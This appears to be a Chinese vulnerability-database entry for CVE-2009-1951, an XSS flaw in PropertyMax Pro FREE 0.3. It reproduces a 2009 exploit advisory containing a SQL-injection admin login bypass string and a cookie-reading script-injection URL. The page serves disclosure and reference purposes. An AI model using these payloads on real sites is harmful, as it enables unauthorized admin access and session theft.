PropertyMax Pro FREE 'index.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117887 漏洞类型 跨站脚本
发布时间 2009-06-02 更新时间 2009-06-08
CVE编号 CVE-2009-1951 CNNVD-ID CNNVD-200906-089
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/8858
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-089
|漏洞详情
PropertyMaxProFREE0.3版本的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助一个mi操作中的一个pl参数,注入任意web脚本或HTML。
|漏洞EXP
########################################################################
[+] PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#########################################################################

[+] SQL Injection ( Auth Bypass) 

Conditions :  magic_quotes_gpc = off

Go to :

   http://127.0.0.1/path/admin

Login as : 

    Username : 'or''='
    Password  : 'or''='

[+] Cross-Site Scripting

     http://127.0.0.1/path/?op=mi&id=2&pl="><script>alert(document.cookie)</script>

#########################################################################

# milw0rm.com [2009-06-02]
|参考资料

来源:MILW0RM
名称:8858
链接:http://www.milw0rm.com/exploits/8858
来源:SECUNIA
名称:35289
链接:http://secunia.com/advisories/35289